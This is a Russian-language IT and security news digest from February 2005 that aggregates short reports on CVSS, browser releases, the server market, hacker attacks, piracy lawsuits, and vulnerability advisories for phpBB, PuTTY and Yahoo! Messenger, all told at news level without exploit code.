Ведущие ИТ-компании договорились о стандартизации оценки уязвимостей в своих продуктах. «Общая система оценки уязвимости» (CVSS) призвана заменить многочисленные градации опасности, специфические для каждой компании. В Microsoft, Qualys, Symantec и других компаниях, поддержавших инициативу, сошлись во мнении, что единая шкала поможет пользователю лучше ориентироваться в оценке степени угроз. Инициатором создания системы стало подразделение Департамента внутренней безопасности США — Консультативный совет по национальной инфраструктуре (NIAC). Решение было принято на конференции RSA в Сан-Франциско. Участники проекта CVSS также договорились об ином подходе к оценке опасностей. Уязвимость оценивается по семи факторам, в частности, возможностям несанкционированного доступа к конфиденциальной информации, модификации данных, атаки «отказ в обслуживании» (DoS). Во внимание будут приниматься возможность удаленной эксплуатации уязвимости, а также период со дня обнаружения уязвимости. В Qualys планируют опубликовать шкалу CVSS в этом году в бесплатном новостном бюллетене Института SANS. Окончательный вариант шкалы находится в процессе доработки, сообщил Тhe Register.
CNews

25/02/2005 10:21 Microsoft AntiSpyware: лиса, ухаживающая за курами
Microsoft добавит в антишпионский продукт AntiSpyware функционал для корпоративных пользователей. В корпорации планируют сделать это не позднее второго полугодия текущего года. Руководство антивирусной фирмы McAfee считает, что продукт корпорации не составит серьезной конкуренции их антишпионским решениям. Вместе с тем, Microsoft подвергают критике. «Многие бизнесы окажутся в положении кур, за которыми ухаживает лиса. Будут ли они доверять Microsoft решение всех тех проблем, которые, по их мнению, ею же и созданы?», — сказал менеджер по маркетингу группы системных решений McAfee Джон Бедрик (John Bedrick). В McAfee считают, что средний и крупный бизнес не станет полагаться исключительно на решение Microsoft. «Оно может быть только частью их антишпионских систем», — считает г-н Бедрик. Тем не менее, вступление Microsoft на рынок противошпионских программ и антивирусов вызвало большой интерес у пользователей. За первые две недели с момента появления бета-версии AntiSpyware на сайте корпорации, ее загрузили около 3 миллионов раз.
CNews

25/02/2005 09:54 Выход Firefox 1.0.1.
Вчера Mozilla Foundation объявила о выходе новой версии популярного браузера с открытым исходным кодом, составляющего в крайнее время всё большую конкуренцию IE, Firefox - 1.0.1. В новом релизе устранены 10 дыр в системе безопасности (устранена брешь, позволяющая подделывать имена доменов, а также ряд дыр, обеспечивающих возможность проведения XSS-атак (Cross-Site Scripting) и фишинг-атак (способ мошенничества, при котором злоумышленники полагаются на глупость и доверчивость своих жертв)) и 10 багов, обнаруженных в предыдущем релизе.
ChangeLog

25/02/2005 09:32 IBM увеличивает отрыв на рынке серверов
В 2004 году IBM продолжила марш-бросок по отрыву от конкурентов на ключевом рынке компьютерной индустрии, наращивая продажи моделей серверов с процессорами х86 и операционной системой Unix. Согласно опубликованному в среду отчету аналитической фирмы Gartner, доходы Big Blue от сбыта серверов с 2003 пo 2004 год увеличились на 9,3% до $16,1 млрд. Этот рост опережает темпы роста рынка в целом, который расширился на 7,2% до $49,5 млрд. Dell росла еще быстрее, увеличив свои доходы на 20% до $4,8 млрд. Однако этого оказалось недостаточно, чтобы опередить игрока номер два Hewlett-Packard, который вырос на 6,7% до $13,4 млрд, или игрока номер три Sun Microsystems, чей доход сократился на 4,0% до $5,2 млрд. IBM много лет лидирует на рынке серверов. Она отразила атаки со стороны Sun, которая взмыла вверх в конце 1990-х, но затем откатилась назад. Теперь IBM атакует Dell многопроцессорными серверами х86 и сражается с НР своими процессорами Power5 против Itanium-серверов НР. «IBM удалось воспользоваться преимуществами серверов Power5 в ходе модернизации существующего парка серверов и для расширения клиентской базы среди пользователей Intel-серверов», — говорит аналитик Gartner Майк Маккалах. IBM продемонстрировала рост в сегменте Unix-серверов, объем которого в целом в 2004 году сократился на 2,8% до $16,2 млрд. Доля IBM увеличилась с 24,3% до 26,7%, а доли Sun и HP сократились соответственно с 32,6% до 31,8%. НР пострадала в секторе Unix при переводе своих систем с собственных процессоров PA-RISC на Intel Itanium. «Увеличение продаж Itanium не компенсирует потери PA-RISC», — отмечает Маккалах.
Подробнее

25/02/2005 09:09 Американский разведчик призывает внедрить в армии систему секретных военных блогов
Капитан-резервист американской армии, сотрудник одной из армейских разведслужб Крис Александер (Kris Alexander) опубликовал статью в популярном компьютерном журнале Wired Magazine, в которой призвал армейское руководство внедрить в рамках секретной американской компьютерной сети Intelink систему блогов. Intelink - сеть, используемая военными, спецслужбами и другими силовыми структурами для обмена информацией. Ее содержимое засекречено, проходящие через нее данные шифруются, однако само ее существование секретом не является. Она представляет из себя обособленную версию "общепринятого" Интернета со своими порталами, чатами и форумами, поисковыми системами, почтовыми службами и другими сервисами. С помощью Intelink сотрудники армии и спецслужб координируют действия, обсуждают рабочие вопросы и получают необходимые знания. Александер отмечает, что подобная система признается весьма эффективной в действии и ее использование приносит много положительных результатов, что сказывается на укреплении национальной безопасности. Однако, по мнению Александера, динамичному развитию системы мешают вызванные особой осторожностью инертность и чрезмерная медлительность некоторых управляющих структур, без санкции которых в Intelink не могут появиться новые сервисы.
Подробности

24/02/2005 14:10 Сайт премьера Японии атакован
В результате атаки хакеров стал временно недоступен официальный сайт премьер-министра Японии Дзюнъитиро Коидзуми и его кабинета. Как сообщил в четверг представитель канцелярии премьера, доступ к «домашней странице» главы правительства был практически невозможен на протяжении 22–23 февраля, передает РИА «Новости». Выяснилось, что злоумышленники устроили DDoS-атаку на сайт, в результате чего сервер сайта оказался перегружен. В настоящее время специалисты Главного полицейского управления проводят профилактические работы и отслеживают интернет-адреса, с которых могла быть проведена компьютерная атака.
РИА "Новости"

24/02/2005 13:35 "Чебоксарский строитель" выплатит штраф Microsoft
Корпорация Microsoft и российская компания «Чебоксарский строитель» подписали мировое соглашение по делу об использования пиратских копий ПО. В ноябре 2004 года арбитражный суд Чувашской республики рассмотрел иск Microsoft, поданный ее юридическими представителями в отношении компании «Чебоксарский строитель» о нарушении авторских прав корпорации. В ходе судебного разбирательства стороны заключили мировое соглашение, по условиям которого руководство «Чебоксарского строителя» признало факт нарушения авторских прав Microsoft в отношении ее программного обеспечения и согласилось выплатить денежную компенсацию в размере 430 тысяч рублей в пользу Microsoft, а также оплатить госпошлину. Мировое соглашение утверждено решением арбитражного суда Чувашской республики. Microsoft подала иск о нарушении авторских прав после того, как 28 июля 2004 года в компании «Чебоксарский строитель» сотрудниками милиции были проведены проверочные мероприятия, в ходе которых на компьютерах, используемых в хозяйственной деятельности, были обнаружены нелицензионные копии программного обеспечения, авторские права на которые принадлежат корпорации Microsoft. Юридические консультанты корпорации Microsoft планируют в ближайшее время подать еще несколько исков против компаний, нарушивших авторские права корпорации.
CNews

24/02/2005 13:04 AMD продемонстрировала двуядерный процессор Athlon 64
Американская компания Advanced Micro Devices (AMD) продемонстрировала свой первый двуядерный процессор Athlon 64 (кодовое название Toledo) для настольных компьютеров. Представленный чип выполнен по 90-нанометровой технологии и оснащен двумя ядрами, каждое из которых имеет по одному мегабайту кэш-памяти второго уровня. Процессор позволяет работать как со стандартными 32-разрядными приложениями, так и со специально адаптированными 64-битными программами. При этом чип производится в той же корпусировке, что и современные одноядерные процессоры Athlon 64. Что касается тактовой частоты нового чипа, то о ней в AMD умалчивают. Ожидается, что первые настольные компьютеры, построенные на базе двуядерных процессоров Athlon 64, появятся в продаже во второй половине нынешнего года. Заинтересовать такие системы должны, в первую очередь, энтузиастов, а также любителей компьютерных игр и дизайнеров, работающих со сложной трехмерной анимацией. Ближе к середине года AMD планирует выпустить двуядерные процессоры Opteron для серверов и рабочих станций.
Подробности

24/02/2005 12:49 Браузер для платформ ARM и WinCE
Разработчики браузера minimo анонсировали релиз 0.1 для процессоров ARM и успешный порт на платформу Windows CE, сообщает linux.org.ru. Сообщается, что браузер пригоден для повседневного использования на карманных компьютерах семейства IPAQ.
Анонс

24/02/2005 12:27 BEA и Sybase присоединились к консорциуму open-source
Производители корпоративных систем — BEA Systems и Sybase — присоединились к консорциуму Eclipse, так что организация open-source пополнилась еще двумя влиятельными компаниями. BEA и Sybase вошли в Eclipse как «стратегические разработчики» и получат места в совете директоров. Организация Eclipse Foundation руководит разработками по нескольким проектам на базе программного обеспечения Eclipse, которое составляет базовую структуру (framework) для объединения разных инструментов программирования в одном приложении. Организация была основана IBM и за последние два года собрала много членов, а ее ПО приобрело популярность среди разработчиков. BEA говорит, что следующая версия ее инструментов разработки Java, WebLogic Workshop, будет основана на ПО Eclipse, то есть Eclipse-совместимые инструменты будут работать с Workshop. Кроме того, BEA возглавит проект разработки платформы веб-инструментов Eclipse, первая версия которой должна выйти этим летом. За BEA стоит большое число Java-программистов — ее сеть разработчиков Dev2dev объединяет около миллиона членов — и она оказала заметное влияние на создание единых спецификаций Java- и веб-сервисов. Одним из первых шагов ВЕА в направлении разработки open-source стал начатый в прошлом году в рамках Eclipse проект Beehive. Это инструменты для быстрого создания серверных Java-приложений с применением готовых программных компонентов.
ZDNet

24/02/2005 11:44 Сингапур потратит 23 миллиона USD на борьбу с хакерами
Правительство Сингапура заявило о намерении потратить свыше 23 миллионов долларов на борьбу с хакерами и другими формами кибертерроризма в ближайшие три года, сообщает Reuters. Для борьбы с компьютерными преступлениями в стране создан Национальный центр мониторинга киберугроз. Специалисты центра будут круглосуточно отслеживать появление новых вирусов, рассказал заместитель председателя правительства Сингапура Тони Тан (Tony Tan). «Мы не можем себе позволить легкомысленно относиться к угрозам кибертеррористов, киберпреступников и безответственных хакеров. Защита информационных и коммуникационных рубежей важна для нас так же, как физическая защита наших границ», — подчеркнул Тан. Сингапур — одна из стран с самым высоким относительным числом интернет-пользователей. 50-60 процентов жителей этого государства с общим населением 4,2 миллиона человек пользуются интернетом дома. В 2003 году власти Сингапура приняли закон, который позволяет наблюдать им за любой компьютерной активностью в стране. Полиция получила право принимать превентивные меры для предотвращения кибератак. По словам Тана, часть заявленных 23 миллионов пойдет на обеспечение безопасности денежных транзакций. Национальный центр мониторинга киберугроз будет работать совместно с производителями антивирусного программного обеспечения и другими странами, борющимися с киберпреступлениями на государственном уровне. Ожидается, что в полном объеме центр заработает ко второй половине 2006 года.
Viruslist

24/02/2005 10:19 ФБР расследует рассылку вирусов от своего имени
Штаб-квартира Федерального бюро расследований (ФБР) США в Вашингтоне обнародовала обращение к пользователям Интернета, в котором сообщила, что в настоящий момент группа неизвестных злоумышленников рассылает с помощью спамерских технологий письма с компьютерными вирусами, подделывая их под официальные письма от ФБР. В ФБР подчеркивают, что никогда не рассылают письма подобным образом по произвольным адресам. Рассылаемые спамерские письма содержат текст, гласящий, что Центр по интернет-преступности ФБР якобы ведет наблюдение за интернет-деятельностью получателя, так как он уличен в посещении сайтов нелегального характера. Получателю предлагается открыть вложенный в письмо файл и ответить на несколько вопросов, якобы от ФБР. После открытия этого файла пользовательский компьютер заражается вирусом, подробностей о которых не приводится. Как отмечает CNN, у ФБР действительно имеется Центр по интернет-преступности, расположенный в штате Западная Вирджиния, однако он не занимается слежением за интернет-деятельностью граждан, а расследует различные интернет-преступления, в частности, подобные данной рассылке.
Подробности

23/02/2005 12:11 Nokia отказалась от IE в пользу Firefox
По некоторым данным, финская компания перевела все свои офисные компьютеры на браузеры Mozilla Firefox, отказавшись от использования MS Internet Explorer. Пока не совсем ясно, насколько достоверна эта информация: журнал The Inquirer приводит ее со ссылкой на сообщения, появившиеся сразу на двух скандинавских сайтах – на норвежском и шведском языках. К сожалению, редакция Интернет.ру не сильна ни в том, ни в другом, а потому придется поверить коллегам на слово. Если слухи действительно подтвердятся, то можно будет считать, что пользовательская база MS Internet Explorer сократилась еще на 55 тысяч человек.
Internet.Ru

23/02/2005 11:38 Хакеры не любят сайты прокуратуры Краснодарского края
В Краснодарском крае временно прекращена работа всех интернет-страниц прокурорских структур городов и районов, в том числе и сайта Анапской межрайонной прокуратуры – одной из самых посещаемых страниц кубанских правоохранительных органов. Как сообщил прокурор Анапы Александр Волошин, сайт, начавший работу около года назад, сейчас недоступен. Сотрудник анапской прокуратуры Владимир Жицкий, редактировавший страницу, переведен на другую работу. По неофициальной информации, "прокурорский" сайт Анапы недавно подвергся атаке хакеров, которые взломали защиту и разместили там информацию о приеме частных объявлений. Кроме того, на форуме появились критические высказывания в адрес краевой администрации. В пресс-службе прокуратуры Кубани подтвердили, что анапская прокуратура не смогла обеспечить должной защиты своей страницы, что послужило причиной появления там сомнительной информации. Сейчас по инициативе прокуратуры края интернет-ресурсы всех городских и районных органов прокуратуры приводятся в соответствие с едиными стандартами, а страница краевой прокуратуры реконструируется. "У нас есть рекомендации Генеральной прокуратуры РФ по обеспечению деятельности электронных страниц прокурорских структур", – сообщили в пресс-службе прокуратуры Краснодарского края. "К сожалению, далеко не все районные и городские прокуратуры имеют возможность обеспечивать должный уровень работы своего сайта. Мы уверены, что ресурсы прокурорских структур должны отвечать самым высоким стандартам качества", – отметили в пресс-службе.
Crime-Research

23/02/2005 10:59 Уязвимость в phpBB
iDEFENSE сообщает об уязвимости в популярном ПО для организации форумов phpBB, которая позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web-сервера. Уязвимость в phpBB обнаружена в нескольких сценариях, отвечающих за обработку "аватаров" (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) и позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
Подробности

23/02/2005 10:36 В интересах безопасности предприятий
Novell начала поставки ПО, основанного на ОС SuSE Linux - Novell Security Manager, которое предназначено для повышения уровня безопасности информационных систем предприятий. В состав снабженного функциями Web-управления продукта входят межсетевой экран, шлюз VPN, блоки защиты от внешних вторжений, вирусных инфекций и спама, а также модуль контентной фильтрации. Новое ПО, инсталлируемое на граничных узлах сети, способно работать в сетевых структурах на основе операционных систем Windows, NetWare, Linux и Unix. Стоимость серверной части и лицензий на десять устройств составляет 315 долл. Novell Security Manager производится на основе OEM-соглашения компанией Astaro.
"Открытые системы"

23/02/2005 10:13 Песни MP3 за копейки? Милиция говорит: «Нет!»
Российский сайт цифровой музыки, позволяющий загружать высококачественные записи почти даром, стал объектом расследования в связи с нарушением авторских прав, проведенного местными правоохранительными органами. Сайт AllofMP3.com функицонирует уже несколько лет, предлагая покупателям загружать музыку всего по два цента за мегабайт — обычно от 4 до 10 центов за песню. Кроме каталога продукции традиционных музыкальных магазинов, подобных Apple iTunes, сайт предлагает песни Beatles и других групп, которые еще не дали разрешения на распространение своих записей в цифровом виде. Российский сайт утверждает, что у него есть лицензия авторско-правовой организации, однако фирмы звукозаписи считают такие лицензии незаконными. После многочисленных жалоб отдел по борьбе с компьютерными преступлениями Московского ГУВД провел в этом месяце расследование и порекомендовал прокуратуре возбудить уголовное дело о нарушении авторских прав. «Мы много раз повторяли, что AllofMP3.com не имеет права распространять репертуар наших членов в России или где-либо еще, — говорится в заявлении Игоря Пожиткова, регионального директора московского отделения Международной федерации индустрии звукозаписи (IFPI). — Мы рады, что милиция довела это важное дело до сведения прокуратуры». Следствие может стать важным шагом вперед для российских владельцев авторских прав. Фирмам звукозаписи и киностудиям часто бывало трудно убедить российские правоохранительные органы заняться проблемами пиратства. Аналогичная группа самопровозглашенных «легальных» сайтов музыкальной загрузки образовалась и в Испании. Они утверждают, что у них есть лицензии на продажу музыки от местных организаций по защите авторских прав. На эти два сайта тоже подали в суд, и теперь в онлайне остается только Weblisten.com. Другой, Puretunes.com, урегулировал иск, выплатив фирмам звукозаписи $10 млн.
ZDNet

23/02/2005 09:41 Реселлеры обвиняют Apple в вытеснении их с рынка незаконными методами
Несколько американских коммерческих фирм, торгующих продукцией Apple, подали на эту компанию в суд штата Калифорния, обвиняя ее в несоблюдении гарантийных обязательств, незаконных и неэтичных методах ведения бизнеса и в других нарушениях коммерческого законодательства. Реселлеры Apple утверждают, что компания пользуется полученной от них закрытой коммерческой информацией для того, чтобы поднять уровень продаж в своих магазинах. Кроме того, заявляется, что Apple, вопреки достигнутым договоренностям, выставляет в своих магазинах более широкий ассортимент и в более короткие сроки, отправляя реселлерам продукцию позже и по более высокой цене. Кроме того, утверждается, что Apple выдает некоторые старые продукты за новые и отказывается продлять сроки гарантийного обслуживания в предусмотренных торговым законодателдьством случаях. Как отмечает издание CNet News, это не единственный подобный иск. Ранее по аналогичным обвинениям против Apple подала иск другая группа реселлеров, возглавляемая торговой компанией MACadam. Реселлеры полагают, что Apple пытается захватить рынок продаж и вытеснить с него реселлеров.
Подробности

23/02/2005 09:02 Поздравляем всех с Днём Защитника Отечества!
UINC поздравляет всех причастных и считающих себя таковыми с Днём Защитника Отечества! Особенно тех, кто в настоящий момент служит в рядах Вооружённых Сил! Хотелось бы пожелать этим, вне всякого сомнения, достойным людям удачи, семейного и финансового благополучия! А "Министру Обороны" г. Иванову заботиться о тех, интересы кого он собственно ОБЯЗАН защищать, а не бодро рапортовать о новых кораблях и ракетах, ибо при том подходе нашего правительства к армии, которое наблюдается в настоящий момент, скоро этими ракетами и кораблями будут управлять господа генералы и лично г. Иванов.
Мы

22/02/2005 13:19 Уязвимости в PuTTY
iDEFENSE сообщает о наличии уязвимости в популярном клиенте для протоколов telnet и ssh - PuTTY. Cамое печальное, что уязвимости имеют статус удалённых. Первая уязвимость связана с некорректной обработкой вводимых пользователем данных передаваемых функции memcpy (функция sftp_pkt_getstring() в файле sftp.c). Вторая уязвимость связана тоже с некорректной обработкой вводимых пользователем данных, передаваемых функции malloc (осуществляется в функции fxp_readdir_recv() - используется в функциях scp_get_sink_action() файла scp.c и sftp_cmd_ls() файла sftp.c). Уязвимость присутствует в PuTTY 0.56. Необходимо отметить, что основные производители дистрибутивов уже выпустили обновлённые версии ПО.
Описание уязвимости

22/02/2005 12:37 Возможность обхода встроенного файрволла Windows?
Как пишет Jay Calvert из HabaneroNetworks.com, им обнаружена возможность обхода защиты, применяемого в ОС Windows при помощи встроенного в эту ОС файрволла ICF. Для этого, якобы, достаточно добавить новый ключ в ветвь рееестра HKEY_LOCAL_MACHINE/SYSTEM/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/AuthorizedApplications/List. При это возникает возможность обхода ограничений, накладываемых ICF (в том числе и на сетевые приложения). Тем не менее, как замечают автору в списке рассылки Bugtraq, полный доступ к данной ветви доступен только для системных эккаунтов SYSTEM и Administrators, остальным пользователям эта ветвь доступна только для чтения. Однако уже появился тип шпионского ПО (spyware), который использует эту "особенность", создавая (при помощи использования одной из уязвимостей) эккаунт в группе Администраторов и потом создавая ключ, который позволяет обходить файрволл. Также отмечается, что это "особенность дизайна" разработчиков сами_знаете_какой_ОС.
Подробности

22/02/2005 12:34 Американская IT-индустрия определяет электронные угрозы безопасности США
В США IT-компании, специализирующиеся на безопасности, совместно с правительством разрабатывают централизованную базу данных, содержащую список электронных угроз национальной безопасности США. Планы по созданию подобной программы были объявлены на прошлой неделе на конференции RSA 2005 в Сан-Франциско. Инициативу поддержали компании Cisco, Microsoft, Symantec, Qualys и eBay. Новая программа является частью программы Национального консультативного совета США (NIAC) по созданию системы раннего предупреждения и оповещения об электронных угрозах. Совет планирует работать со всеми отраслями экономики Америки - транспортной, банковской, производственной, энергетической и другими. В ближайших планах компаний, разработка системы ранжирования степени опасности угроз. Партнеры пока не определились с проблемой того, как и где хранить эту БД. Также стоит отметить, что Microsoft в январе 2005 года запустила свою программу интернет-безопасности для правительственных учреждений, представив ее на заседании Еврокомиссии.
CyberSecurity

22/02/2005 12:05 Украинские киберполицейские арестовали Российского мошенника
В Севастополе задержан гражданин Российской Федерации, пытавшийся обманным путем перевести через интернет на свою кредитную карточку 64 тысяч гривен с чужих счетов. Задержанный мужчина 1978 года рождения является жителем Екатеринбурга, а в Севастополь приехал к своей невесте. Из ее квартиры он и выходил в интернет, каждый раз пользуясь одним и тем же провайдером через телефонное соединение. Благодаря этому сотрудникам службы безопасности «Приватбанка» удалось вычислить адрес злоумышленника. В настоящий момент горе-хакер задержан и находится в изоляторе временного содержания. Милиция возбудила уголовное дело по статье 190 часть 3 «Мошенничество с применением электронно-вычислительной техники». Злоумышленнику грозит лишение свободы на срок от трех до восьми лет. Правоохранители утверждают, что ранее на Украине уже возбуждались уголовные дела по факту кражи средств с кредитных карточек, однако милиции ни разу не удавалось обнаружить и задержать хакеров.
SecurityLab

22/02/2005 11:43 В Linux 2.6.12 появится полная фильтрация пакетов для IPv6
ПО netfilter/iptables, входящее в состав ядра открытой операционной системы Linux, поддерживает т.н. «stateless» (с неполным анализом данных) фильтрацию пакетов и для IPv4, и для IPv6, однако возможность более безопасного метода фильтрации с использованием анализа всех потоков пакета (а не только проверки заголовков некоторых из них) на данный момент работает только в IPv4. Ожидается, что режим фильтрации «stateful» для новой версии интернет-протокола (IPv6) появится уже в ядре Linux версии 2.6.12. По словам Гаральда Велте (Harald Welte), разработчика проекта Netfilter, обновление не войдет в ближайший Linux-релиз в связи с тем, что «команда разработчиков ядра уже занимается стабилизированием 2.6.11», и добавление патча такого масштаба на данном этапе неуместно. Поэтому ожидать его появления можно только к версии Linux 2.6.12, которая появится в мае или июне — никаких точных сроков Велте приводить не стал, потому что, по его словам, «план релизов ядра — это как фондовая биржа: никогда не знаешь, что может случиться».
Nixp.Ru

22/02/2005 11:30 Новый безопасный интернет-протокол
Новая разработка поможет сделать более безопасными мобильные интернет-операции с кредитными картами, паролями и прочей информацией, которую необходимо сохранять в тайне. Новый протокол был анонсирован учеными на конференции American Association for the Advancement of Science (AAAS) в минувшую субботу. Протокол позволяет в сети из многих компьютеров (стационарных или мобильных) идентифицировать друг друга и устанавливать безопасное соединение. «Задержка перед раскрытием пароля» (delayed password disclosure, DPD) — так назвали свою разработку авторы — Маркус Якобссон (Markus Jakobsson) и Стив Майерс (Steve Myers) из Indiana University. Протокол будет применим в любой среде, где необходима взаимная идентификация и аутентификация сетевых устройств. DPD позволит пользователям избежать преступников, расставляющих поддельные WiFi-сети с целью последующей кражи данных с подключившегося к ним компьютера. Как сообщается, DPD также предупредит, если вы попытаетесь кликнуть по ссылке, пришедшей вам в письме, если таковая ссылка ведет на сайт-обманку. Разработчики также не удержались от того, чтобы анонсировать антитеррористическую составляющую своего изобретения. DPD позволит предотвратить массовую кражу реквизитов доступа к банковским счетам и, таким образом, затруднит перевод и отмывание денежных средств террористическими и другими преступными группами. Внедрение нового протокола, вероятно, может ускорить распространение онлайнового банкинга. Когда интернет-пользователи станут понимать, что кража их личных данных и реквизитов доступа к банковскому счету стала крайне низка, онлайновый банкинг станет предпочтительным средством управления денежными средствами. В общих чертах технология DPD работает следующим образом. Пользователь намеревается зайти в свой пользовательский интерфейс управления банковским счетом (или войти в WiFi-сеть со своего ноутбука). Для проверки подлинности сайта или сети, DPD сначала посылает зашифрованную информацию, расшифровать которую можно, только зная пароль. Естественно, сайт или сеть, если они валидные, знают пароль, расшифровывают информацию и направляют ее назад пользователю. DPD получает информацию и делает вывод о валидности сайта или сети. Сайт или сеть также делают вывод о валидности пользователя, поскольку пароль подошел к зашифрованной информации, полученной от пользователя.
"Вебпланета"

22/02/2005 11:17 Cabir добрался до Америки
Мобильный вирус, рожденный на Филиппинах восемь месяцев назад, наконец добрался до берегов Соединенных Штатов. На сегодняшний день, как пишет Reuters, вирус засветился уже в двенадцати странах, положив, таким образом, начало эры мобильных эпидемий. В отличие от эпидемий компьютерных, размах которых ограничен двумя-тремя сотнями миллионов машин, подключенных к интернету, у эпидемий мобильных куда больше шансов потрясти мир: число мобильных терминалов уже исчисляется миллиардами (хотя смартфонов среди них миллионов сорок-пятьдесят, их число и удельный вес в общей массе будет расти). Так вот, возвращаясь к "кабиру". По словам Микко Хиппонена (Mikko Hypponen), возглавляющего антивирусную компанию F-Secure, первая американская копия вируса была обнаружена в магазине технических безделушек в Санта-Монике, что в Калифорнии. Вирус дал о себе знать, когда мимо магазина проходил владелец смартфона с включенным Bluetooth-приемником: Cabir предложил ему, так сказать, развлечься.
Internet.Ru

22/02/2005 10:53 PGP переходит на SHA256/512
Корпорация PGP решила отказаться от использования алгоритма SHA1 для цифровой подписи и теперь будет использовать алгоритмы SHA256/512. Возможно, это связано с недавно обнаруженной китайскими исследователями из университета в Шандоне уязвимостью в алгоритме шифрования SHA1, широкоприменяемом в SSL многими браузерами.
Подробности

22/02/2005 10:27 Сбой в электроснабжении "уронил" Wikipedia
В ночь с понедельника на вторник многие пользователи интернета остались без доступа к любимому источнику справочной информации. Знаменитая онлайновая энциклопедия Wikipedia прекратила работы из-за сбоя в энергоснабжении. На главной странице энциклопедии на момент подготовки данного материала находилось сообщение о ведении работ по восстановлению данных из резервных копий. Это достаточно длительная процедура, так как восстановлению подлежат базы данных общим объемом 170 Гб, расположенные на нескольких серверах. Сбой в электроснабжении произошел в 21 февраля 14:15 по времени тихоокеанского побережья США (в Москве в это время наступило 22 февраля). Отключение энергии произошло внутри здания, в котором находятся серверы и сетевое оборудование, обеспечивающее работу энциклопедии, и поэтому генератор, предназначенный для резервного электроснабжения в случае отключения энергии, поступающей от электростанций, оказался бесполезен. Ситуация усугубилась тем, что основная и резервная линия энергоснабжения отключились одновременно. Через несколько минут подача энергии была восстановлена, и часть сетевого оборудования и серверов перезагрузились. Однако попытки "поднять" основной и хотя бы один вспомогательный сервер баз данных сразу после возобновления подачи электроэнергии успехом не увенчались. Часть базы данных оказалось поврежденной, и ее требуется полностью восстановить из резервных копий. Как только достаточное число серверов заработают в нормальном режиме, доступ к Wikipedia будет вновь открыт (сначала только в режиме чтения, редактировать статьи станет возможным только по окончании всех работ). Пока же владельцы энциклопедии для доступа к ее ресурсам рекомендуют использовать кэш поисковой системы Google.
"Компьюлента"

22/02/2005 10:06 Проект Xen получает мощную поддержку
Киты индустрии положили свой вес на чашу весов проекта open-source Xen, так что за считанные месяцы из полной безвестности он взлетел к славе. Xen позволяет нескольким операционным системам работать на одном и том же компьютере, помогая выжимать из него максимальную отдачу. Сегодня такая технология широко применяется на мощных серверах, но чтобы использовать ее на рядовых системах, требуется проприетарное ПО «виртуальной машины» от VMware, дочерней компании EMC. На выставке-конференции LinuxWorld в Бостоне многие компании выразили поддержку Xen в форме одобрения, оказания помощи в разработке и вклада собственного ПО. В Xen приняли участие Sun Microsystems, Hewlett-Packard, Novell, Red Hat, Intel, Advanced Micro Devices и Voltaire, но одним из наиболее интересных союзников проекта обещает стать IBM которая десятилетиями экспериментирует в этой области. «Два-три месяца назад об этом проекте никто не знал. Теперь он способен внести серьезные изменения в общий подход к работе с Linux», — говорит вице-президент по исследованиям и разработкам Novell SuSE Linux Крис Шлегер. Эти изменения иллюстрируют, как происходит прогресс в мире программного обеспечения open-source: проект может вызывать целый каскад коопераций между множеством заинтересованных сторон. Когда это удается, как в случае Linux, вся эта деятельность ведет к созданию единого, быстро развивающегося проекта, вместо частных, взаимно несовместимых конкурирующих друг с другом разработок. «Сообщество open-source решило, наконец, сгладить противоречия и сплотиться вокруг одного проекта виртуализации, так что теперь он сможет воплотиться в жизнь, заменив дюжину воюющих княжеств, по два воина в каждом», — говорит аналитик Illuminata Гордон Хафф.
Сайт проекта

21/02/2005 15:12 Хакеры Китая объявили перемирие
"Союз хакеров Китая" (Honkers Union of China, HUC), крупнейшая и одна из первых хакерских групп в КНР, объявила о самороспуске и закрытии своего сайта. Как отмечает китайское информационное агентство Синьхуа, HUC занимала пятую строчку в мировом рейтинге самых престижных хакерских групп. В открытом письме основатель группы Lion указывает, что HUC уже продолжительное время существовала только как имя, а сайт группы закрывался несколько раз. "Я с большой неохотой вынужден расстаться с тем, что сопровождало мое взросление", пишет Lion. HUC была основана в декабре 2000 года и занималась в основном дефейсами сайтов. Кроме того, члены группы, в которую входили студенты, бизнесмены, учителя и профессионалы сетевой безопасности, написали несколько вирусов, в частности, Lion worm. Широкой общественности HUC известна в первую очередь "сетевой войной" 2001 года между китайскими и американскими хакерами. С точки зрения HUC, эта "война" была спровоцирована американцами, которые после инцидента с захватом американского самолета-разведчика и гибелью пилота китайского истребителя 1 апреля 2001 года начали взламывать китайские сайты, оставляя на них оскорбления в адрес китайского народа и погибшего пилота. Через месяц китайские хакеры объявили о начале ответных действий - начался массовый взлом американских сайтов, в числе которых оказались и правительственные. После того, как на счету Honker Union оказалось более тысячи испорченных американских веб-узлов, группа распространила заявление о том, что считает свою цель достигнутой и оповещает об окончании "сетевой войны". В ходе инцидента компании-владельцы сайтов по обе стороны океана предпринимали усиленные меры по контролю за безопасностью своих систем, а некоторые сайты были закрыты.
Crime-Research

21/02/2005 14:09 В Yahoo! Messenger найдены "дыры"
Российские эксперты обнаружили уязвимости в программе обмена мгновенными сообщениями Yahoo! Messenger. Одна уязвимость позволяет подменить имя загружаемого файла, она находится в области отображении длинных имен файлов в диалоговом окне загрузки. Удаленный пользователь может создать имя файла, содержащее большое количество пробелов и два расширения и обмануть пользователя. Другая «дыра» позволяет повысить свои права в системе благодаря использованию утилиты ping.exe во время фазы тестирования соединения при установке программы. Уязвимость находится в Audio Setup Wizard (asw.dll). Локальный пользователь может создать файл ping.exe в установочном каталоге Yahoo! Messenger и выполнить его с привилегиями пользователя, устанавливающего приложение. Уязвимости имеют рейтинг опасности «низкая». Им подвержены версии Yahoo! Messenger 6.0.0.1750 и более ранние. Для использования указанных «дыр» уже создан эксплоит. Эксперты по ИТ-безопасности советуют установить соответствующий патч от производителя программы, сообщил Securitylab.
SecurityLab

21/02/2005 13:56 Аналитик Gartner уличил Microsoft в намерении сокрушить антивирусный рынок
